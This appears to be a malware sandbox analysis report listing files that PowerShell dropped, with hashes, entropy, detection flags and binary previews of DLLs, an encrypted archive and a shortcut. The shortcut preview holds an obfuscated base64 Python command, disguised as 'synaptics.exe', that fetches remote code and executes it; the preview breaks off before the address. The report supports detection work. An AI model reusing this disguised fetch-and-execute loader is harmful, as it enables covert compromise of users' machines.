                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38388621
                                                                                                                                                                                                            Entropy (8bit):7.991142195686566
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:786432:99VUcHZeUOCZG+9sUgAiAdCX5GzscguwiddhASn0UFYFDk:TVbeUS+GAZ7JAiThASLYFDk
                                                                                                                                                                                                            MD5:AAB458ECEF654501E4A6E317DBE2B0B4
                                                                                                                                                                                                            SHA1:C667ED704735AFB86B461F742C6A2F7029027915
                                                                                                                                                                                                            SHA-256:5311222C1839A55EA2226479EE65DB19D1DC00D6B15BE4C23B231D75A9BA4889
                                                                                                                                                                                                            SHA-512:BFE03FFF3E0E20679983B4BFD2E0C0372720898645FF4450802DC6BB2D2007D5BEAFFFB80ACAD02F4FFAC33A99AEFCC3F26BAD99DD536DB17B7196D7F77B3EEC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK.........VWY................DLLs/PK...........V.J\*......".....DLLs/libcrypto-1_1.dll..XTI...(*......b.9b@PQ..s.bN...-.0..1g...0g1....r..n0.8..w.y.{...gS{W.U..V.Te.F..................?o..5..W..G.lr.?..n...={...W...[v..=.U[.^}.yv..Y%..g..m..H.<.W...c3.|.O......|O..N......G...=;....k...IP....iZ.5...{?.o.N..;...........q..1.....BS.i...!A.g...\...d.oN..c. ..k.t..!.5.._.)...%.gU......`.....E..4.....b........_.1Y...)..P....v;......oe.~.....'..........9.m..W...x......ji0.....|.....b..].V.P.g...b0...Y.^ng....k.m8...o.....P.P.v..+.y..JkC............J.F..\...U......;...*......)~....|+.!.?ebCL..J......b....bZ_Jd.YU\.6.Mi........Nc..b..Ih.1$V..F..j'...1G2.n.e....RG.).d.~..Oe.i.R....l.Y.@u.9U#}.5.Q.~O.j.=T..^..i.^g.W....[...1.Q?..+#......I.-VjA)..P.z}.9SV.7.A.....B<rB2C.C_..1..!&eQu.\G.C..&}K....a..1.....P..LHk..x .!f.<a.....A..v..O....Z..;Qm....}.d.JU.c...y..`.P.a.....>.....Sm..*x.R...}...,..=-x.6.|...p`......w'..Rg..Q\..r....Y..c.2..V...U...xE.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Wed Nov 13 11:26:19 2024, mtime=Wed Nov 13 11:26:19 2024, atime=Wed Apr 5 03:47:42 2023, length=100120, window=hidenormalshowminimized
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2416
                                                                                                                                                                                                            Entropy (8bit):3.8872444446911336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:8WoLHMERPur++mSc63u6lLdLXuH2b0yF:8LsY2rW43huWb0y
                                                                                                                                                                                                            MD5:436DE77B0F4A173D54983FFCBBF39CF3
                                                                                                                                                                                                            SHA1:FF5BED5C5100CF4EBC5430DE39C0F15CF4E2631F
                                                                                                                                                                                                            SHA-256:2657C55467E7B6B13B9E286B36130D211908321CB041146DC8F67F45826436BB
                                                                                                                                                                                                            SHA-512:2753D48E3884B0378C0FF413078621934E96C4E7A45A60062AFA3E70F2217C4B395CED6369E008402F404876CE5515CAB270A07EA922588F038049B709CE1F2B
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:L..................F.@.. ....^.>.5...^.>.5......yg............................:..DG..Yr?.D..U..k0.&...&......vk.v....o./..5..N..?.5......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^mY c...........................%..A.p.p.D.a.t.a...B.P.1.....mY.c..Local.<......CW.^mY.c....b.....................C...L.o.c.a.l.....^.1.....mYJc..XFSOJ9~1..F......mY.cmYJc..........................c.`.x.F.S.O.j.9.E.l.1.Q.....h.2......V.% .SYNAPT~1.EXE..L......mYJcmYJc....._........................s.y.n.a.p.t.i.c.s...e.x.e.......d...............-.......c....................C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe......\.x.F.S.O.j.9.E.l.1.Q.\.s.y.n.a.p.t.i.c.s...e.x.e...-.c. .".i.m.p.o.r.t. .b.a.s.e.6.4.;.e.x.e.c.(.b.a.s.e.6.4...b.6.4.d.e.c.o.d.e.(.'.a.W.1.w.b.3.J.0.I.H.V.y.b.G.x.p.Y.i.5.y.Z.X.F.1.Z.X.N.0.O.2.l.t.c.G.9.y.d.C.B.i.Y.X.N.l.N.j.Q.7.Z.X.h.l.Y.y.h.i.Y.X.N.l.N.j.Q.u.Y.j.Y.0.Z.G.V.j.b.2.R.l.K.H.V.y.b.G.x.p.Y.i.5.y.Z.X.F.1.Z.X.N.0.L.n.V.y.b.G.9.w.Z.W.4.o.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):56600
                                                                                                                                                                                                            Entropy (8bit):6.701238830377098
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:FDUfUUn5KdYveu2H7sz9YHIRTRILOnY7SyOPx3A:FDgDn0KPz9YHIxRILOnYIx3A
                                                                                                                                                                                                            MD5:252C9B6FCC220FE16499ABF4A8E2A2E8
                                                                                                                                                                                                            SHA1:03327874A1153E9FE640E6F5E8D987CCC84034C4
                                                                                                                                                                                                            SHA-256:E01FDB89380EBF58700F40DCEBAFCB37F24970C8EA1F33063BDEA873B53E720D
                                                                                                                                                                                                            SHA-512:F68C9D043D5EF7A32098DDD9C1622F761F88DA31CA47450AB1D95E51AB8CD06E1658DC57DB150AAF51B682F7F285654E6BBD118B3CA8400BB5B2D461BDC78926
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win32.Patched.29806.7109.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: electrum-4.5.3-setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: electrum-4.5.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:...T..T..T....T...U..T...Q..T...P..T...W..T.m.U..T..U..T..U.+.T.m.\..T.m.T..T.m....T.m.V..T.Rich..T.........................PE..L...9.,d...........!.....R...\.......V.......p......................................B.....@.............................P......d......................../..........(...T...............................@............p...............................text...TP.......R.................. ..`.rdata...7...p...8...V..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):72472
                                                                                                                                                                                                            Entropy (8bit):6.8432832170573255
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:QxDhX4Vb2zMIsTRGxT+0q8i9qK5ILCVwQ7Sy8Pxer:mhi2zvsCK0ti9qK5ILCVwQ6xw
                                                                                                                                                                                                            MD5:5C952E57426E429F6F4CEC9FEB841815
                                                                                                                                                                                                            SHA1:83BFD2108E188909C7FF3B294AB9C99336D02D06
                                                                                                                                                                                                            SHA-256:B682E9E8152036BDEBF4CA5410D3C0F88FA3272A969830F63C7B61BB1F0DA89F
                                                                                                                                                                                                            SHA-512:2B6AB5F24E7E232C8906AC12C5A4994CFCF1B061FFC25407F278DE3D97664716C24E58237EE6EC48949AC6C1F4522AA1CA4C5238015D128E3A9BE602D2CE0ED2
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win32.Patched.29806.7109.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: electrum-4.5.3-setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: electrum-4.5.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.:...i...i...i.svi...i.~.h...i.d.i...i.~.h...i.~.h...i.~.h...i.~.h...i.s.h...i...i...i.~.h...i.~.h...i.~.i...i.~.h...iRich...i........PE..L...Y.,d...........!.........D.............................................. ......!.....@.............................H................................/.......... ...T...........................x...@...............8............................text............................... ..`.rdata...-..........................@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):108312
                                                                                                                                                                                                            Entropy (8bit):6.644234290397436
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:qS6mSAe9tVW/dhyGfnH/Jt5Phld/7VILLPf17Mxk:qS6mzInWlhyiH/Jt1d/7wJ
                                                                                                                                                                                                            MD5:FF0992DFB0D4D90BDCEAAD68246C5C22
                                                                                                                                                                                                            SHA1:3508B7D730DDE3DB94AE413625451AE8CAA0BD7D
                                                                                                                                                                                                            SHA-256:F879F86BF65CE05EE3467DF65C55B9837F9DFFB0F024C350C9A9869A08609759
                                                                                                                                                                                                            SHA-512:8BEBC01958D71B327CBC39ED04BC53F6484CAA0232A1FD71E6691BDAA89FCBC766BC888D45870DC24D1190C48A0AE0A58C447EC936E34DB23059EE6F35A138BB
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.....................H..............................................Y........&................$..........Rich...........................PE..L...W.,d...........!................................................................)]....@.........................P4.......4.......p...............x.../.........../..T............................/..@............................................text...!........................... ..`.rdata..TK.......L..................@..@.data...l....P.......:..............@....rsrc........p.......V..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35096
                                                                                                                                                                                                            Entropy (8bit):6.856901996202479
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:x3FDljnh+RUbUnsiatJIL6kI25YiSyvEPxWEaOx:hpljnhzb0siatJIL6kIM7SysPxBx
                                                                                                                                                                                                            MD5:D839A0426122A593313EA52251A1A9FB
                                                                                                                                                                                                            SHA1:FF8BD676733F1CB2D509ECAF28678D750429E3B8
                                                                                                                                                                                                            SHA-256:634D610F37E9052C008A973098512E804FF6B484AB6BADBD28C1A922D4534C4C
                                                                                                                                                                                                            SHA-512:73D00B20C8D97BA409CBFDA31F5D819DA8275470C13E5C574B14C809FCF1C25444874930D86054BA2E1DEC96A96D9572B0CDD60E5F30D225B69770C9CA619257
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:f..:f..:f..B...:f..Og..:f..Oc..:f..Ob..:f..Oe..:f.bOg..:f..Bg..:f..:g..:f.bOn..:f.bOf..:f.bO...:f.bOd..:f.Rich.:f.........................PE..L.....,d...........!.....,.........../.......@............................................@......................... G.......S.......p...............Z.../..........xB..T............................B..@............@...............................text....+.......,.................. ..`.rdata..l....@.......0..............@..@.data...X....`.......J..............@....rsrc........p.......L..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):195864
                                                                                                                                                                                                            Entropy (8bit):6.894532348319941
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:HJwcAu1LgDNsFyrbz5arkp1Lq00rBCXN4hmuqaxgU3pJMWlXgWcW+33SgRILOqXv:HNAg8rRaULECXN4Quqax33XMW5gJW+34
                                                                                                                                                                                                            MD5:FBE8BB3048DF17FF9DDB0972825FDA71
                                                                                                                                                                                                            SHA1:E3AD65446B60554CB9F7C45700BE2EAD1453772F
                                                                                                                                                                                                            SHA-256:283AA604D532B6239AA8D8794C8D8A4F3A11C93DFBCEF846315CFD74F5E07E2F
                                                                                                                                                                                                            SHA-512:48C66F10F9E79359DF63FD381C21B4559438DAE7AD84C625EFE1C7AB802F31BB8D326650F654C8EA504791595D801679A6F156F7ED90DA98AEBC04D2120C90A6
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m<.c)].0)].0)].0 %"0'].0{(.1+].0{(.1%].0{(.1#].0{(.1-].0.(.1*].0b%.1+].0)].0.].0.(.1&].0.(.1(].0.(N0(].0.(.1(].0Rich)].0................PE..L...E.,d...........!................(........ ......................................R.....@.............................P...`............................/......t.......T...............................@............ ..d............................text............................... ..`.rdata....... ......................@..@.data...x...........................@....rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114968
                                                                                                                                                                                                            Entropy (8bit):6.774198419515606
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Z+6/1DqY6SFc720NRIF2Upji0101tgJIL6fijC8u8xF:Tw9uWy01tgW+g
                                                                                                                                                                                                            MD5:9CBEE02CC8FB2DA7C05B9D6EB5FC38A2
                                                                                                                                                                                                            SHA1:1D0F75F30BDF542E6A275DCA0192C70AE3B2F455
                                                                                                                                                                                                            SHA-256:AFB9950D0B16254025F3C2DE68C877381D3DA57FEFDB02504C21EE8D4C2E84E5
                                                                                                                                                                                                            SHA-512:99841EA990FE5874F3B4975318AC81D144D22CE6A6C245A001B67F33BE3A6D41901B18387F9A1564CAD3544F077812D0AE78D8880C66E79FBFDB1DD50117D2A0
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..7...7...7.......7..6...7..2...7..3...7..4...7.\.6...7..6...7...6.:.7.\.?...7.\.7...7.\....7.\.5...7.Rich..7.........................PE..L...A.,d...........!.........t.......!.......0............................................@.........................Pf..X....f..x......................../...........a..T............................b..@............0..P............................text...l........................... ..`.rdata..ZE...0...F... ..............@..@.data................f..............@....rsrc................p..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):49432
                                                                                                                                                                                                            Entropy (8bit):6.749500211425154
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:H+OYENKnr4deUNXT1Ee20RILOIS5YiSyvWPxWEa1E:HbYENsr4MWT1Ee20RILOIQ7SyOPxl
                                                                                                                                                                                                            MD5:2AC2DEE9FDB32BE30FEFD4FDB5D280B3
                                                                                                                                                                                                            SHA1:5E803C5D649521CAB34BFC7EF6DC44954915220D
                                                                                                                                                                                                            SHA-256:F10C90062EAA68F41B1A6B34F3796E3AB8E0D765E595236E893CFF9FAD30116A
                                                                                                                                                                                                            SHA-512:86A7DFE6F15FCE67ACCBC84262C73D25F2E440B7529143235B9B32F15F7804F99206E24C5ED8E5219BB5895BF6E397304BA153E064FF97EED23F5E92469E901E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.&...H...H...H.......H._.I...H._.M...H._.L...H._.K...H...I...H.F.I...H...I...H...I.H...@...H...H...H......H...J...H.Rich..H.........PE..L...q.,d...........!.....>...T.......C.......P.......................................+....@..........................w..P....w.........................../..........(s..T............................s..@............P...............................text...t=.......>.................. ..`.rdata..j4...P...6...B..............@..@.data...h............x..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):148248
                                                                                                                                                                                                            Entropy (8bit):7.03034519275223
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:VcSEmJbTMWUCFHRQWtwjEYZLlFrFvIB+hBJQ8T374Tu2d//zHf39mNoBJNWQ5ILt:GwUC9RQWtwjEGgYXT3CTvYOVWQI
                                                                                                                                                                                                            MD5:6174470C775AD7529891E1BA3C54F87B
                                                                                                                                                                                                            SHA1:A1536BDECFD42F99BD1CC561EC727D81F613D205
                                                                                                                                                                                                            SHA-256:E1E346F8B9FA43EC5519166D92625168EBB642A70F52611545117631C74181BD
                                                                                                                                                                                                            SHA-512:0595EA1C8D2784D1C8272E29D8E9C1C074FFA1CA14116AE7E65C52DA1D1E87A0AE1FD9D3EF285F887A8847008DA1EBE3E1F6ACF1294AFDC9E2F31216F7AB7CB4
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*.P.D.P.D.P.D.Y...T.D...E.R.D...A.[.D...@.Z.D...G.S.D...E.S.D...E.R.D.P.E.1.D...L.j.D...D.Q.D.....Q.D...F.Q.D.RichP.D.........PE..L.....,d...........!.....f..........<k.......................................@.......C....@.............................L.......x.... .................../...0..t.......T...........................H...@...............x............................text...[e.......f.................. ..`.rdata..b............j..............@..@.data...H...........................@....rsrc........ ......................@..@.reloc..t....0......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):37656
                                                                                                                                                                                                            Entropy (8bit):6.790398784644929
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uW9a35lnOP/xoUAIpd+o7uMnm9YVp5Dsa5ILCGaY35YiSyvJPxWEas6:T9a35lOPJmmVp5Dh5ILCGz7SyBPxA
                                                                                                                                                                                                            MD5:87A21CFE0CB3953D5D1442042A72C602
                                                                                                                                                                                                            SHA1:2E33DCF83DAA1642CBE38BBD1CABC15072DCDC1C
                                                                                                                                                                                                            SHA-256:8DF955D1CA6519173E34785FB9F38D1D52F4EDBA4F0E0742749F13AEF19A8F34
                                                                                                                                                                                                            SHA-512:01222931EA798F6783EE6F665FE2E3B911BA7818651DD89E7EB0F1EC8EBCB4912361593E6FA24427DE6A74C5F53AE9A99F291A8F85A985DFCD10546FAB6B3B03
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.{...(...(...(.s[(...(.~.)...(.~.)...(.~.)...(.~.)...(.~.)...(.s.)...(...(...(.~.)...(.~.)...(.~7(...(.~.)...(Rich...(................PE..L...F.,d...........!.....(...<.......-.......@.......................................<....@.........................PW..H....W.......................d.../...........R..T...........................8S..@............@...............................text...j'.......(.................. ..`.rdata...!...@..."...,..............@..@.data........p.......N..............@....rsrc................T..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):29976
                                                                                                                                                                                                            Entropy (8bit):6.798507676792536
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:aQJATEdgw8HYcj4HjzjuRTBax6i+5/ZMILWBLCHQIYiSy1pCQHcPxh8E9VF0NyUC:9kHYDs88HFZMILWtY5YiSyv8PxWEaC
                                                                                                                                                                                                            MD5:7AB685D3F467C7029DEE1A943BB19065
                                                                                                                                                                                                            SHA1:BCADE206E6863874EAF72A1CAA748FBDEE916970
                                                                                                                                                                                                            SHA-256:91889BBF6DFADFC026276141A4260D7F2C19090FDE9EE04490B9211DD3933EBA
                                                                                                                                                                                                            SHA-512:D8E8CABA0D030FA0433D71D376608ACA2DA003D76C67FE9AB8C7B7E4A6AA7E0C21454E1D45CD052BB67B681B57094BDFA9CD634C1A1AE22C104568D20D13B02A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ Nb.A 1.A 1.A 1.9.1.A 1.4!0.A 1.4%0.A 1.4$0.A 1.4#0.A 1i4!0.A 1.A!1.A 1.9!0.A 1i4(0.A 1i4 0.A 1i4.1.A 1i4"0.A 1Rich.A 1........PE..L...D.,d...........!.........,...............0......................................./....@.........................P<..`....<..x....`...............F.../...p.......7..T............................8..@............0..H............................text...t........................... ..`.rdata.......0......................@..@.data...`....P.......4..............@....rsrc........`.......8..............@..@.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):42264
                                                                                                                                                                                                            Entropy (8bit):6.794037552069512
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:Hv9eDBCwgCnLEggqKboqjzezQPxNILXtV05YiSyvdPxWEaoC:FwgULj8NvezQPxNILXtVe7SylPxRC
                                                                                                                                                                                                            MD5:0A4AAABED72E8E08143EB129E5E24407
                                                                                                                                                                                                            SHA1:A85094E29FE1DE755DFB2BB2650378CA7BD1F5F2
                                                                                                                                                                                                            SHA-256:2233C561A18D92ADC2F4C56D6C55ADFB4A01049E801BDD3BB2A03CEE125F6E43
                                                                                                                                                                                                            SHA-512:79942D76D23376C71028EED8658E2C938DFE64D54D56FC60C0CA8F2FCA9515D7A5A24A5ABFDCB51DFF944ED2F7BEB17B6D5BA50D45A62DE9A7DB4FDCF6A04F62
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P..f...f...f......f...g...f...c...f...b...f...e...f...g...f...g...f...g...f...b...f...n...f...f...f.......f...d...f.Rich..f.................PE..L...H.,d...........!.....8...>......]<.......P......................................{.....@..........................h..X...(i.......................v.../......$...8d..T............................d..@............P...............................text...$6.......8.................. ..`.rdata...#...P...$...<..............@..@.data................`..............@....rsrc................d..............@..@.reloc..$............n..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28440
                                                                                                                                                                                                            Entropy (8bit):6.828727954203399
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:gtbUDut6rf1vYvVILQUG5YiSyvhPxWEa4:uUa8f1vYvVILQU87SyJPxp
                                                                                                                                                                                                            MD5:2E6FE907E37F3F9154DB187C1B7F8232
                                                                                                                                                                                                            SHA1:77F25B5D95097DFDA0F9FD58632F8711091547CD
                                                                                                                                                                                                            SHA-256:763D333C80F4C11861C9210C4BD53FEDA24B5598AC9270391B2EC250BD52B636
                                                                                                                                                                                                            SHA-512:D87683A681D576CB334BDF2CE385E6BDB115D18232E160F17535A6BA432342604ADE6404F085F64ECA63C639860968603D4D8DB11A11520A1BC44B2A57FE00AF
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p..p..p....p...q..p...u..p...t..p...s..p.m.q..p..q..p..q...p.m.x..p.m.p..p.m....p.m.r..p.Rich..p.................PE..L...H.,d...........!.........*...............0............................................@..........................<..L....=..d....`...............@.../...p..\...`8..T............................8..@............0...............................text............................... ..`.rdata.......0......................@..@.data...@....P.......0..............@....rsrc........`.......2..............@..@.reloc..\....p.......<..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):69912
                                                                                                                                                                                                            Entropy (8bit):6.7529275237414
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XAqVY6E4oksA1MT9f8+CeJ+8WyKTVVILLwt7SyJPxl:XAqVY3FA1MT9f8DeJ+8W9TVVILLwtvxl
                                                                                                                                                                                                            MD5:A092B2DE9E1128F73E26D142A5B2D68B
                                                                                                                                                                                                            SHA1:0C5E38B11389ACC870056200710F4152FBB03429
                                                                                                                                                                                                            SHA-256:389D2B94A3562879F9E0A17CACE1574EE308AC39A5D9F5659F885284C9B2D19E
                                                                                                                                                                                                            SHA-512:60D45D3BEF3C8729CA879816A321B8508AE304A84499E715CB2AD7352273A6482B82C960092311E3EF40F1326D6533CE25B61953A197F7D3FBCE2C0CF511D5E2
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
